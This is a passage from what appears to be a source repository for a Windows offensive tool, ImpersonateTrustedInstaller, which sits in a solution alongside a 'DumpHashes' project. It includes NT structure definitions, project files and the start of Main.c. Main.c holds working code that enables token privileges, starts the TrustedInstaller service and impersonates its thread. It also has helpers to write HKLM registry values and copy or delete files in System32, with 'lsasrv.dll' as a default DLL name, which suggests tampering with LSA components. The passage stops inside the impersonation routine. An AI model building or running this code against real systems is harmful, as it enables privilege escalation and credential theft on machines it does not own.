// HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23 698 | SystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation 699 | SystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX (EX in: LOGICAL_PROCESSOR_RELATIONSHIP RelationshipType) // since WIN7 // KeQueryLogicalProcessorRelationship 700 | SystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) 701 | SystemStoreInformation, // q; s: SYSTEM_STORE_INFORMATION (requires SeProfileSingleProcessPrivilege) // SmQueryStoreInformation 702 | SystemRegistryAppendString, // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110 703 | SystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege) 704 | SystemVhdBootInformation, // q: 
SYSTEM_VHD_BOOT_INFORMATION 705 | SystemCpuQuotaInformation, // q; s: PS_CPU_QUOTA_QUERY_INFORMATION 706 | SystemNativeBasicInformation, // q: SYSTEM_BASIC_INFORMATION 707 | SystemErrorPortTimeouts, // SYSTEM_ERROR_PORT_TIMEOUTS 708 | SystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION 709 | SystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation 710 | SystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION 711 | SystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool) 712 | SystemSystemPtesInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120 713 | SystemNodeDistanceInformation, // q: USHORT[4*NumaNodes] // (EX in: USHORT NodeNumber) 714 | SystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26 715 | SystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation 716 | SystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1 717 | SystemSessionBigPoolInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8 718 | SystemBootGraphicsInformation, // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only) 719 | SystemScrubPhysicalMemoryInformation, // q; s: MEMORY_SCRUB_INFORMATION 720 | SystemBadPageInformation, 721 | SystemProcessorProfileControlArea, // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA 722 | SystemCombinePhysicalMemoryInformation, // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130 723 | SystemEntropyInterruptTimingInformation, // q; s: SYSTEM_ENTROPY_TIMING_INFORMATION 724 | SystemConsoleInformation, // q; s: 
SYSTEM_CONSOLE_INFORMATION 725 | SystemPlatformBinaryInformation, // q: SYSTEM_PLATFORM_BINARY_INFORMATION (requires SeTcbPrivilege) 726 | SystemPolicyInformation, // q: SYSTEM_POLICY_INFORMATION (Warbird/Encrypt/Decrypt/Execute) 727 | SystemHypervisorProcessorCountInformation, // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION 728 | SystemDeviceDataInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION 729 | SystemDeviceDataEnumerationInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION 730 | SystemMemoryTopologyInformation, // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION 731 | SystemMemoryChannelInformation, // q: SYSTEM_MEMORY_CHANNEL_INFORMATION 732 | SystemBootLogoInformation, // q: SYSTEM_BOOT_LOGO_INFORMATION // 140 733 | SystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // (EX in: USHORT ProcessorGroup) // since WINBLUE 734 | SystemCriticalProcessErrorLogInformation, 735 | SystemSecureBootPolicyInformation, // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION 736 | SystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX 737 | SystemSecureBootInformation, // q: SYSTEM_SECUREBOOT_INFORMATION 738 | SystemEntropyInterruptTimingRawInformation, 739 | SystemPortableWorkspaceEfiLauncherInformation, // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION 740 | SystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin) 741 | SystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX 742 | SystemBootMetadataInformation, // 150 743 | SystemSoftRebootInformation, // q: ULONG 744 | SystemElamCertificateInformation, // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION 745 | SystemOfflineDumpConfigInformation, // q: OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 746 | SystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION 747 | SystemRegistryReconciliationInformation, // s: NULL (requires admin) (flushes registry hives) 748 | SystemEdidInformation, // q: 
SYSTEM_EDID_INFORMATION 749 | SystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD 750 | SystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION 751 | SystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION 752 | SystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION (EX in: USHORT ProcessorGroup) // 160 753 | SystemVmGenerationCountInformation, 754 | SystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION 755 | SystemKernelDebuggerFlags, // SYSTEM_KERNEL_DEBUGGER_FLAGS 756 | SystemCodeIntegrityPolicyInformation, // q; s: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION 757 | SystemIsolatedUserModeInformation, // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION 758 | SystemHardwareSecurityTestInterfaceResultsInformation, 759 | SystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION 760 | SystemAllowedCpuSetsInformation, 761 | SystemVsmProtectionInformation, // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation) 762 | SystemInterruptCpuSetsInformation, // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170 763 | SystemSecureBootPolicyFullInformation, // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION 764 | SystemCodeIntegrityPolicyFullInformation, 765 | SystemAffinitizedInterruptProcessorInformation, // (requires SeIncreaseBasePriorityPrivilege) 766 | SystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION 767 | SystemCpuSetInformation, // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2 768 | SystemCpuSetTagInformation, // q: SYSTEM_CPU_SET_TAG_INFORMATION 769 | SystemWin32WerStartCallout, 770 | SystemSecureKernelProfileInformation, // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION 771 | SystemCodeIntegrityPlatformManifestInformation, // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE 772 | SystemInterruptSteeringInformation, // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180 
773 | SystemSupportedProcessorArchitectures, // p: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx 774 | SystemMemoryUsageInformation, // q: SYSTEM_MEMORY_USAGE_INFORMATION 775 | SystemCodeIntegrityCertificateInformation, // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION 776 | SystemPhysicalMemoryInformation, // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2 777 | SystemControlFlowTransition, // (Warbird/Encrypt/Decrypt/Execute) 778 | SystemKernelDebuggingAllowed, // s: ULONG 779 | SystemActivityModerationExeState, // SYSTEM_ACTIVITY_MODERATION_EXE_STATE 780 | SystemActivityModerationUserSettings, // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS 781 | SystemCodeIntegrityPoliciesFullInformation, 782 | SystemCodeIntegrityUnlockInformation, // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190 783 | SystemIntegrityQuotaInformation, 784 | SystemFlushInformation, // q: SYSTEM_FLUSH_INFORMATION 785 | SystemProcessorIdleMaskInformation, // q: ULONG_PTR[ActiveGroupCount] // since REDSTONE3 786 | SystemSecureDumpEncryptionInformation, 787 | SystemWriteConstraintInformation, // SYSTEM_WRITE_CONSTRAINT_INFORMATION 788 | SystemKernelVaShadowInformation, // SYSTEM_KERNEL_VA_SHADOW_INFORMATION 789 | SystemHypervisorSharedPageInformation, // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4 790 | SystemFirmwareBootPerformanceInformation, 791 | SystemCodeIntegrityVerificationInformation, // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION 792 | SystemFirmwarePartitionInformation, // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200 793 | SystemSpeculationControlInformation, // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above. 
794 | SystemDmaGuardPolicyInformation, // SYSTEM_DMA_GUARD_POLICY_INFORMATION 795 | SystemEnclaveLaunchControlInformation, // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION 796 | SystemWorkloadAllowedCpuSetsInformation, // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5 797 | SystemCodeIntegrityUnlockModeInformation, 798 | SystemLeapSecondInformation, // SYSTEM_LEAP_SECOND_INFORMATION 799 | SystemFlags2Information, // q: SYSTEM_FLAGS_INFORMATION 800 | SystemSecurityModelInformation, // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1 801 | SystemCodeIntegritySyntheticCacheInformation, 802 | SystemFeatureConfigurationInformation, // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210 803 | SystemFeatureConfigurationSectionInformation, // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION 804 | SystemFeatureUsageSubscriptionInformation, // SYSTEM_FEATURE_USAGE_SUBSCRIPTION_DETAILS 805 | SystemSecureSpeculationControlInformation, // SECURE_SPECULATION_CONTROL_INFORMATION 806 | SystemSpacesBootInformation, // since 20H2 807 | SystemFwRamdiskInformation, // SYSTEM_FIRMWARE_RAMDISK_INFORMATION 808 | SystemWheaIpmiHardwareInformation, 809 | SystemDifSetRuleClassInformation, 810 | SystemDifClearRuleClassInformation, 811 | SystemDifApplyPluginVerificationOnDriver, 812 | SystemDifRemovePluginVerificationOnDriver, // 220 813 | SystemShadowStackInformation, // SYSTEM_SHADOW_STACK_INFORMATION 814 | SystemBuildVersionInformation, // SYSTEM_BUILD_VERSION_INFORMATION 815 | SystemPoolLimitInformation, // SYSTEM_POOL_LIMIT_INFORMATION (requires SeIncreaseQuotaPrivilege) 816 | SystemCodeIntegrityAddDynamicStore, 817 | SystemCodeIntegrityClearDynamicStores, 818 | SystemDifPoolTrackingInformation, 819 | SystemPoolZeroingInformation, // SYSTEM_POOL_ZEROING_INFORMATION 820 | SystemDpcWatchdogInformation, 821 | SystemDpcWatchdogInformation2, 822 | SystemSupportedProcessorArchitectures2, // q: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // 
NtQuerySystemInformationEx // 230 823 | SystemSingleProcessorRelationshipInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // (EX in: PROCESSOR_NUMBER Processor) 824 | SystemXfgCheckFailureInformation, 825 | SystemIommuStateInformation, // SYSTEM_IOMMU_STATE_INFORMATION // since 22H1 826 | SystemHypervisorMinrootInformation, // SYSTEM_HYPERVISOR_MINROOT_INFORMATION 827 | SystemHypervisorBootPagesInformation, // SYSTEM_HYPERVISOR_BOOT_PAGES_INFORMATION 828 | SystemPointerAuthInformation, // SYSTEM_POINTER_AUTH_INFORMATION 829 | SystemSecureKernelDebuggerInformation, 830 | SystemOriginalImageFeatureInformation, 831 | MaxSystemInfoClass 832 | } SYSTEM_INFORMATION_CLASS; 833 | 834 | 835 | 836 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/phnt_ntdef.h#L59 837 | typedef LONG KPRIORITY, * PKPRIORITY; 838 | 839 | 840 | 841 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntkeapi.h#L17 842 | typedef enum _KTHREAD_STATE 843 | { 844 | Initialized, 845 | Ready, 846 | Running, 847 | Standby, 848 | Terminated, 849 | Waiting, 850 | Transition, 851 | DeferredReady, 852 | GateWaitObsolete, 853 | WaitingForProcessInSwap, 854 | MaximumThreadState 855 | } KTHREAD_STATE, * PKTHREAD_STATE; 856 | 857 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntkeapi.h#L50 858 | typedef enum _KWAIT_REASON 859 | { 860 | Executive, 861 | FreePage, 862 | PageIn, 863 | PoolAllocation, 864 | DelayExecution, 865 | Suspended, 866 | UserRequest, 867 | WrExecutive, 868 | WrFreePage, 869 | WrPageIn, 870 | WrPoolAllocation, 871 | WrDelayExecution, 872 | WrSuspended, 873 | WrUserRequest, 874 | WrEventPair, 875 | WrQueue, 876 | WrLpcReceive, 877 | WrLpcReply, 878 | WrVirtualMemory, 879 | WrPageOut, 880 | WrRendezvous, 881 | WrKeyedEvent, 882 | WrTerminated, 883 | WrProcessInSwap, 884 | WrCpuRateControl, 885 | WrCalloutStack, 886 | WrKernel, 887 | WrResource, 888 | WrPushLock, 889 | WrMutex, 890 | WrQuantumEnd, 891 | 
WrDispatchInt, 892 | WrPreempted, 893 | WrYieldExecution, 894 | WrFastMutex, 895 | WrGuardedMutex, 896 | WrRundown, 897 | WrAlertByThreadId, 898 | WrDeferredPreempt, 899 | WrPhysicalFault, 900 | WrIoRing, 901 | WrMdlCache, 902 | MaximumWaitReason 903 | } KWAIT_REASON, * PKWAIT_REASON; 904 | 905 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1706 906 | typedef struct _SYSTEM_THREAD_INFORMATION 907 | { 908 | LARGE_INTEGER KernelTime; 909 | LARGE_INTEGER UserTime; 910 | LARGE_INTEGER CreateTime; 911 | ULONG WaitTime; 912 | PVOID StartAddress; 913 | CLIENT_ID ClientId; 914 | KPRIORITY Priority; 915 | KPRIORITY BasePriority; 916 | ULONG ContextSwitches; 917 | KTHREAD_STATE ThreadState; 918 | KWAIT_REASON WaitReason; 919 | } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION; 920 | 921 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1736 922 | typedef struct _SYSTEM_PROCESS_INFORMATION 923 | { 924 | ULONG NextEntryOffset; 925 | ULONG NumberOfThreads; 926 | LARGE_INTEGER WorkingSetPrivateSize; // since VISTA 927 | ULONG HardFaultCount; // since WIN7 928 | ULONG NumberOfThreadsHighWatermark; // since WIN7 929 | ULONGLONG CycleTime; // since WIN7 930 | LARGE_INTEGER CreateTime; 931 | LARGE_INTEGER UserTime; 932 | LARGE_INTEGER KernelTime; 933 | UNICODE_STRING ImageName; 934 | KPRIORITY BasePriority; 935 | HANDLE UniqueProcessId; 936 | HANDLE InheritedFromUniqueProcessId; 937 | ULONG HandleCount; 938 | ULONG SessionId; 939 | ULONG_PTR UniqueProcessKey; // since VISTA (requires SystemExtendedProcessInformation) 940 | SIZE_T PeakVirtualSize; 941 | SIZE_T VirtualSize; 942 | ULONG PageFaultCount; 943 | SIZE_T PeakWorkingSetSize; 944 | SIZE_T WorkingSetSize; 945 | SIZE_T QuotaPeakPagedPoolUsage; 946 | SIZE_T QuotaPagedPoolUsage; 947 | SIZE_T QuotaPeakNonPagedPoolUsage; 948 | SIZE_T QuotaNonPagedPoolUsage; 949 | SIZE_T PagefileUsage; 950 | SIZE_T PeakPagefileUsage; 951 | SIZE_T PrivatePageCount; 952 
| LARGE_INTEGER ReadOperationCount; 953 | LARGE_INTEGER WriteOperationCount; 954 | LARGE_INTEGER OtherOperationCount; 955 | LARGE_INTEGER ReadTransferCount; 956 | LARGE_INTEGER WriteTransferCount; 957 | LARGE_INTEGER OtherTransferCount; 958 | SYSTEM_THREAD_INFORMATION Threads[1]; // SystemProcessInformation 959 | // SYSTEM_EXTENDED_THREAD_INFORMATION Threads[1]; // SystemExtendedProcessinformation 960 | // SYSTEM_EXTENDED_THREAD_INFORMATION + SYSTEM_PROCESS_INFORMATION_EXTENSION // SystemFullProcessInformation 961 | } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION; 962 | 963 | 964 | #endif // !STRUCTS_H 965 | -------------------------------------------------------------------------------- /ImpersonateTrustedInstaler.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.12.35527.113 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImpersonateTrustedInstaler", "ImpersonateTrustedInstaler\ImpersonateTrustedInstaler.vcxproj", "{10D17572-BFE8-45DE-946B-09F7B840D62E}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dummy", "DumpHashes\DumpHashes.vcxproj", "{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x64.ActiveCfg = Debug|x64 19 | {10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x64.Build.0 = Debug|x64 20 | {10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x86.ActiveCfg = Debug|Win32 21 | {10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x86.Build.0 = Debug|Win32 22 | 
{10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x64.ActiveCfg = Release|x64 23 | {10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x64.Build.0 = Release|x64 24 | {10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x86.ActiveCfg = Release|Win32 25 | {10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x86.Build.0 = Release|Win32 26 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x64.ActiveCfg = Debug|x64 27 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x64.Build.0 = Debug|x64 28 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x86.ActiveCfg = Debug|Win32 29 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x86.Build.0 = Debug|Win32 30 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x64.ActiveCfg = Release|x64 31 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x64.Build.0 = Release|x64 32 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x86.ActiveCfg = Release|Win32 33 | {A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | EndGlobal 39 | -------------------------------------------------------------------------------- /ImpersonateTrustedInstaler/ImpersonateTrustedInstaler.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {10d17572-bfe8-45de-946b-09f7b840d62e} 25 | ImpersonateTrustedInstaler 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | 
WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /ImpersonateTrustedInstaler/ImpersonateTrustedInstaler.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /ImpersonateTrustedInstaler/ImpersonateTrustedInstaler.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ImpersonateTrustedInstaler/Main.c: -------------------------------------------------------------------------------- 1 | #define UNICODE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #pragma comment(lib, "Shlwapi.lib") 10 | #pragma comment(lib, "Advapi32.lib") 11 | 12 | // 
// ===============================================================================================================================================================================
//
// Main.c (command-line driver). The part of the file visible here holds: a
// privilege-enabling helper, TrustedInstaller thread impersonation, HKLM
// registry read/write helpers, System32 copy/delete helpers, the usage text
// and the beginning of wmain (wmain continues beyond this excerpt). The
// registry key paths and value names the helpers act on are parameters
// supplied by the caller; only the two DLL-name defaults below are visible.


// Default DLL-name string; its use is in wmain, outside this excerpt.
#define OG_DLL_NAME_TO_SET_1001 L"lsasrv.dll"

// The trailing backslash on the next comment line joins the #define into the
// comment, so OG_DLL_NAME_TO_SET_1002 is NOT defined in this build.
//\
#define OG_DLL_NAME_TO_SET_1002 L"dpapisrv.dll"


// ===============================================================================================================================================================================

// Prototype of ntdll!NtImpersonateThread; the address is resolved at run time
// with GetProcAddress in ImpersonateTrustedInstaller.
typedef NTSTATUS(NTAPI* fnNtImpersonateThread)(HANDLE ServerThreadHandle, HANDLE ClientThreadHandle, PSECURITY_QUALITY_OF_SERVICE SecurityQos);

// ===============================================================================================================================================================================

/*
 * Print the system message text for a Win32 error code to stdout.
 *
 * dwErrorCode: Win32 error code, typically a GetLastError() result.
 *
 * FormatMessageW allocates the message buffer (FORMAT_MESSAGE_ALLOCATE_BUFFER),
 * so it is released with LocalFree. Trailing CR/LF characters are stripped
 * before printing. No return value; a FormatMessageW failure is itself
 * reported on stdout.
 */
VOID PrintErrorMessageW(IN DWORD dwErrorCode) {

    LPWSTR szMessageBuffer = NULL;
    DWORD dwLength = 0x00;

    dwLength = FormatMessageW(
        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM |FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,
        dwErrorCode,
        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPWSTR)&szMessageBuffer,
        0x00,
        NULL
    );

    if (dwLength == 0x00 || szMessageBuffer == NULL)
    {
        printf("[!] FormatMessageW Failed With Error: %lu\n", GetLastError());
    }
    else
    {
        // System messages end with "\r\n"; trim so the output stays on one line.
        while (dwLength > 0x00 && (szMessageBuffer[dwLength - 0x01] == L'\r' || szMessageBuffer[dwLength - 0x01] == L'\n'))
        {
            szMessageBuffer[--dwLength] = L'\0';
        }

        printf("[!] %ws\n", szMessageBuffer);
    }

    // Buffer was allocated by FormatMessageW on our behalf.
    if (szMessageBuffer)
        LocalFree(szMessageBuffer);
}

// ===============================================================================================================================================================================

/*
 * Enable one named privilege on the current process token.
 *
 * szPrivilegeName: privilege name constant such as SE_DEBUG_NAME.
 * Returns TRUE when the privilege is enabled, FALSE otherwise.
 *
 * (HANDLE)-1 is the current-process pseudo-handle. AdjustTokenPrivileges
 * returns success even when the token does not hold the privilege, which is
 * why ERROR_NOT_ALL_ASSIGNED is checked separately afterwards.
 * NOTE(review): the "%d" specifiers below receive a DWORD; the rest of the
 * file uses "%lu" for GetLastError().
 */
BOOL EnablePrivilege(IN LPCWSTR szPrivilegeName) {

    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES TokenPrivs = { 0 };
    LUID Luid = { 0 };
    BOOL bResult = FALSE;

    if (!LookupPrivilegeValueW(NULL, szPrivilegeName, &Luid)) {
        printf("[!] LookupPrivilegeValueW Failed With Error: %d \n", GetLastError());
        return FALSE;
    }

    if (!OpenProcessToken((HANDLE)-1, TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        printf("[!] OpenProcessToken Failed With Error: %d \n", GetLastError());
        return FALSE;
    }

    TokenPrivs.PrivilegeCount = 0x01;
    TokenPrivs.Privileges[0].Luid = Luid;
    TokenPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivs, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
        printf("[!] AdjustTokenPrivileges Failed With Error: %d \n", GetLastError());
        goto _END_OF_FUNC;
    }

    // A non-zero return above does not mean the privilege was granted.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        printf("[!] Not All Privileges Referenced Are Assigned To The Caller \n");
        goto _END_OF_FUNC;
    }

    bResult = TRUE;

_END_OF_FUNC:
    if (hToken)
        CloseHandle(hToken);
    return bResult;
}
// ===============================================================================================================================================================================

/*
 * Make the calling thread impersonate a thread of the TrustedInstaller service.
 *
 * Steps: connect to the SCM and open the "TrustedInstaller" service; if it is
 * not running, start it and poll every 200 ms until it reports
 * SERVICE_RUNNING; take a thread snapshot and choose the first thread owned by
 * the service's PID; open that thread with THREAD_DIRECT_IMPERSONATION; call
 * NtImpersonateThread with the current-thread pseudo-handle ((HANDLE)-2) as
 * the server thread. Returns TRUE on success. Every handle is released on all
 * paths through _END_OF_FUNC.
 *
 * NOTE(review): the polling loop has no timeout and tests only for
 * SERVICE_RUNNING, so a service that fails to start leaves this loop spinning.
 * NOTE(review): printf and wprintf are mixed in this function; the rest of
 * the file is mostly wprintf.
 * For monitoring purposes, the observable actions are a service-start request
 * for TrustedInstaller and a cross-process thread handle opened with
 * THREAD_DIRECT_IMPERSONATION followed by impersonation at
 * SecurityImpersonation level.
 */
BOOL ImpersonateTrustedInstaller() {

    SC_HANDLE hScm = NULL;
    SC_HANDLE hSvc = NULL;
    THREADENTRY32 ThreadEntry32 = { .dwSize = sizeof(THREADENTRY32) };
    SERVICE_STATUS_PROCESS ssp = { 0 };
    DWORD dwBytesNeeded = 0x00,
        dwTrustedInstTid = 0x00;
    HANDLE hSnap = INVALID_HANDLE_VALUE;
    HANDLE hTrustedInstThread = NULL;
    BOOL bResult = FALSE;

    if (!(hScm = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT))) {
        wprintf(L"[!] OpenSCManager Failed With Error: %lu\n", GetLastError());
        goto _END_OF_FUNC;
    }

    if (!(hSvc = OpenServiceW(hScm, L"TrustedInstaller", SERVICE_QUERY_STATUS | SERVICE_START))) {
        wprintf(L"[!] OpenService Failed With Error: %lu\n", GetLastError());
        goto _END_OF_FUNC;
    }

    if (!QueryServiceStatusEx(hSvc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssp, sizeof(ssp), &dwBytesNeeded)) {
        wprintf(L"[!] QueryServiceStatusEx [%d] Failed With Error: %lu\n", __LINE__, GetLastError());
        goto _END_OF_FUNC;
    }

    if (ssp.dwCurrentState != SERVICE_RUNNING) {
